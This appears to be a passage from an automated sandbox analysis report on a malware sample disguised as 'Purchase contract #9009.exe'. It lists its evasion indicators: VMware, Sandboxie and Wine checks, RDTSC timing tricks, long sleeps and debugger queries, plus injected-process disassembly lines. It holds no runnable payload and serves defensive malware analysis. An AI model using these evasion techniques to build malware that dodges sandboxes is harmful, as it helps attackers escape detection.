          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Purchase contract #9009.exe PID: 6948, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000002EA85E4 second address: 0000000002EA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000002EA897E second address: 0000000002EA8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe TID: 6952Thread sleep time: -41114s >= -30000s
          Source: C:\Users\user\Desktop\Purchase contract #9009.exe TID: 4696Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4044Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7056Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeThread delayed: delay time: 41114
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.687420389.000000000FCE0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.681816397.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.678706314.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.681816397.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.681847888.000000000A64D000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.674285838.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.682069588.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase contract #9009.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004088B0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409B20 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01671074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01662073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01674015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01674015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01627016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01627016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01627016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01623884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01623884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01678B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_016253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01675BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0165B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01678A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_01634257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0166AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_015DD294 mov eax, dword ptr fs:[00000030h]
